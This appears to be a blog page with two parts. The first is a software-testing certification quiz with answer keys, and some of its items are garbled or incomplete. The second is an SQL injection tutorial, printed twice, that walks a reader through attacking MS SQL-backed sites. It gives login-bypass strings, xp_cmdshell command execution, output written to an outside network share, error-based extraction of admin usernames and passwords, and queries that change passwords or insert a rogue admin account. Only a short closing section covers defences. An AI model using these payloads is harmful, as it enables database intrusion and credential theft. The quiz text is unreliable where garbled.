1. Which of the following are the typical defects found by static analysis tools?
a. Variables that are never used.
b. Security vulnerabilities.
c. Poor performance.
d. Unreachable code.
e. Business processes not followed.
A. b, c and d are true; a and e are false
B. a is true; b, c, d and e are false
C. c, d and e are true; a and b are false
D. a, b and d are true; c and e are false
Answer: D
2. Which of the following are characteristics of good testing in any life cycle model?
a. Every development activity has a corresponding test activity.
b. Testers review development documents early.
c. There are separate levels for component and system integration test.
d. Each test level has objectives specific to that level.
e. Each test level is based on the same test basis.
A. a, d and e
B. b, c and e
C. a, c and d
D. a, b and d
Answer: D
3. Which of the following statements are true in relation to component testing?
a. Stubs may be used.
b. May cover resource behaviour (e.g. memory leaks).
c. Tests the interactions between software components.
d. Defects are typically fixed without formally managing these defects.
A. a, c and d
B. a, b and d
C. b, c and d
D. a, b and c
Answer: B
4. A system specification states that a particular field should accept alphabetical characters in either upper or lower case. Which of the following test cases is from an INVALID equivalence partition?
A. Feeds
B. F33ds
C. FEEDS
D. fEEDs
Answer: B
5. Which of the following statements is GENERALLY true of testing?
a. Testing can show the presence of defects.
b. Testing reduces the probability of uncovered defects.
c. Testing can show that a previously present defect has been removed.
d. Testing can prove that software is defect free.
A. a, b and c
B. a, b and d
C. a, c and d
D. b, c and d
Answer: A
6. Which ADDITIONAL test level could be introduced into a standard V-model after system testing?
A. System Integration Testing
B. Acceptance Testing
C. Regression Testing
D. Component Integration Testing
Answer: A
7. Which statement BEST describes the role of testing?
A. Testing ensures that the right version of code is delivered
B. Testing can be used to assess quality.
C. Testing shows that the software is error free.
D. Testing improves quality in itself.
Answer: B
8. Which tasks would USUALLY be performed by a test leader and which by the tester?
a. Adapt planning based on test results.
b. Create test specifications.
c. Plan tests.
d. Write or review a test strategy
A. c and d by the test leader; a and b by the tester
B. a and b by the test leader; c and d by the tester.
C. a and d by the test leader; b and c by the tester
D. a, c and d by the test leader; b by the tester.
Answer: D
9. When in the lifecycle should testing activities start?
A. As early as possible
B. After the test environment is ready
C. After the requirements have been reviewed
D. Once the code is available to test
Answer: A
10. Which one of the following is a characteristic of good testing in any lifecycle model?
A. Each test level has the same test objective.
B. There should be more testing activities than development activities.
C. Test design can only begin when development is complete.
D. Testers should begin to review documents as soon as drafts are available.
Answer: D
11. During which activity of the Fundamental Test Process do you review the test basis?
A. Evaluating exit criteria and reporting.
B. Test implementation and execution
C. Test analysis and design
D. Test planning and control
Answer: C
12. Which one of the following statements about approaches to test estimation is true?
A. A metrics-based approach is based on data gathered from previous projects; an expert-based approach uses the knowledge of the owner of the tasks or experts
B. A metrics-based approach is based on creating a work-breakdown structure first; an expert-based approach is based on input from estimation experts
C. A metrics-based approach is based on data gathered from previous projects; an expert-based approach is based on a work-breakdown structure
D. A metrics-based approach is based on an analysis of the specification documents; an expert-based approach is based on the opinion of the most experienced tester in the organization
Answer: A
13. Which ordering of the list below gives increasing levels of test independence?
a. Tests designed by a fellow-member of the design team.
b. Tests designed by a different group within the organization.
c. Tests designed by the code author.
d. Tests designed by different organization.
A. c, a, b, d.
B. d, b, a, c
C. c, a, d, b.
D. a, c, d, b.
Answer: A
14. Which of the following are structure-based techniques?
a. Decision table testing
b. Boundary value analysis
c. Multiple condition coverage
d. Use case testing
e. Decision testing
A. a and c.
B. b and d.
C. b and e.
D. c and e.
Answer: D
15. Pair the correct test design techniques (i to v) with the category of techniques (x, y and z):
i) Exploratory Testing
ii) Equivalence Partitioning
iii) Decision Testing
iv) Use Case Testing
v) Condition coverage
x) Specification-based
y) Structure-based
z) Experienced-based
A. x = i and ii; y = iii and v; z = iv.
B. x = i, ii and iv; y = v; z = iii
C. x = ii and iv; y = iii and v; z = i.
D. x = iii and iv; y = v; z = i and ii.
16. Which of the following is a MAJOR task of evaluating exit criteria and reporting?
A. Writing a test summary report for stakeholders
B. Logging the outcome of test execution
C. Repeating test activities as a result of action taken for each discrepancy.
D. Evaluating testability of the requirements and system
Answer: A
17. The digital ainbow Thermometer uses 7 colours to show the ambient temperature. Each colour spans a range of just 5, with an operating minimum and maximum of minus 5 and 30. Which of the following values is minimum and maximum of minus 5? and 30?. Which of the following values is LEAST likely to have been identified when applying the boundary value test design technique?
A. 3030?
B. 00?
C. 8?8
D. 15 15?
Answer: C
18. In which activity of the Fundamental Test Process is the test environment set up?
A. Test implementation and execution.
B. Test planning and control
C. Test analysis and design
D. Evaluating exit criteria and reporting
Answer: A
19. Which of the following statements about black box and white box techniques is correct?
A. Decision Testing, Equivalence Partitioning and Condition Coverage are all black box techniques
B. Decision Table Testing, State Transition and Use Case Testing are all black box techniques
C. Decision Testing, Equivalence Partitioning and Statement Testing are all white box techniques
D. Boundary Value Analysis, State Transition and Statement Testing are all white box techniques
Answer: B
20. Which of the following are characteristic of test management tools?
a) They support traceability of tests to source documents.
b) They provide an interface to test execution tools.
c) They help to enforce coding standards.
d) They manipulate databases and files to set up test data.
A. a and c
B. b and c
C. a and b
D. b and d
Answer: C
21. How is the scope of maintenance testing assessed?
A. Scope is related to the risk, size of the changes and size of the system under test
B. Scope is defined by the size and type of system being changed
C. Scope is defined by the size and type of system being changed
D. Scope is related to the number of system users affected by the change.
Answer: A
22. A system under development contains complex calculations and decision logic, and it is assessed as high risk because of the relative inexperience of the development team in the application domain. Which of the following would be the MOST appropriate choice of test design technique for component testing?
A. Decision testing.
B. Statement testing
C. State transition testing
D. Equivalence partitioning
Answer: A
23. Which of the following is an example of a product risk?
A. Software that does not perform its intended functions
B. Failure of a third party
C. Problems in defining the right requirements
BH0-010
D. Skill and staff shortages
Answer: A
24. Given the following sample of pseudo code:
01 Input number of male tigers
02 Input number of female tigers
03 If male tiger > 0 and female tiger > 0 then
04 Input Do you want to breed (Yes / No)
05 If breed = No?
06 Print Keep male and female tigers apart
07 End if
08 End If
Which of the following test cases will ensure that statement 6 is executed?
A. male tiger = 1, female tiger = 1, breed = yes
B. male tiger = 1, female tiger = 1, breed = no
C. male tiger = 1, female tiger = 2, breed = yes
D. male tiger = 1, female tiger = 0, breed = no
Answer: B
25. Which of the following BEST describes a data-driven approach to the use of test execution tools?
A. Monitoring response times when the system contains a specified amount of data
B. Manipulation of databases and files to create test data
C. Using a generic script that reads test input data from a file
D. Recording test scripts and playing them back
Answer: C
26. Which statement about combinations of inputs and preconditions is true for a large system?
A. It is easy to test them all in a short time
B. It is not practically possible to test them all
C. It is not possible to test any of them
D. It is essential to test them all in order to do good testing
Answer: B
28. Which of the following is a purpose of the review kick off activity?
A. Explain the objectives
B. Select the personnel group
C. Document results
D. Define entry and exit criteria
Answer: A
29. Which one of the following is true of software development models?
A. There are always four test levels in the V-model.
B. In a Rapid Application Development (RAD) project, there are four test levels for each iteration.
C. In Agile development models, the number of test levels for an iteration can vary depending on the project.
D. There must be at least four test levels for any software development model.
Answer: C
30. Which of the following activities should be performed during the selection and implementation of a testing tool?
a) Determine whether the organization existing test process needs to change.
b) Conduct a proof of concept.
c) Implement the selected tool on a project behind schedule to save time.
d) Identify coaching and mentoring requirements for the use of the selected tool
A. a, b and c.
B. b, c and d.
C. a, c and d.
D. a, b and d.
Answer: D
31. The following code segment contains a potential "divide by 0" error.
J=50 K=1 while (N>=−10) and (N<=10) loop M [K] = J/N K = K + 1 N = N − 1 end loop; Which of the following is the most effective way of detecting this error?
A. Boundary testing B. Condition testing C. Compilation of the source code D. Source code inspection
Answer: D
32. A test team consistently finds between 90% and 95% of the defects present in the system under test. While the test manager understands that this is a good defect-detection percentage for her test team and industry, senior management and executives remain disappointed in the test group, saying that the test team misses too many bugs. Given that the users are generally happy with the system and that the failures which have occurred have generally been low impact, which of the following testing principles is most likely to help the test manager explain to these managers and executives why some defects are likely to be missed?
A. Exhaustive testing is impossible B. Defect clustering C. Pesticide paradox D. Absence-of-errors fallacy
Answer: A
33. System test execution on a project is planned for eight weeks. After a week of testing, a tester suggests that the test objective stated in the test plan of 'finding as many defects as possible during system test' might be more closely met by redirecting the test effort according to which test principle?
A. Impossibility of exhaustive testing. B. Importance of early testing. C. The absence of errors fallacy. D. Defect clustering
Answer: D
34. Which of the following statements is MOST OFTEN true?
A. Source-code inspections are often used in component testing. B. Component testing searches for defects in programs that are separately testable. C. Component testing is an important part of user acceptance testing. D. Component testing aims to expose problems in the interactions between software and hardware components.
Answer: B
Tuesday, December 27, 2011
Saturday, November 26, 2011
Wednesday, November 23, 2011
SQL Injections
1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
2 What do you need?
Any web browser.
3 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
Everything between the have potential parameters that might be useful (exploit wise).
4 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
5 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
If luck is on your side, you will get login without any login name or password.
6 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
7 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
8 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
9 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
10 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
11 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
12 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
13 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
14 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
2 What do you need?
Any web browser.
3 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
Everything between the have potential parameters that might be useful (exploit wise).
4 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
5 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
If luck is on your side, you will get login without any login name or password.
6 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
7 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
8 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
9 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
10 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
11 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
12 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
13 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
14 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
Subscribe to:
Posts (Atom)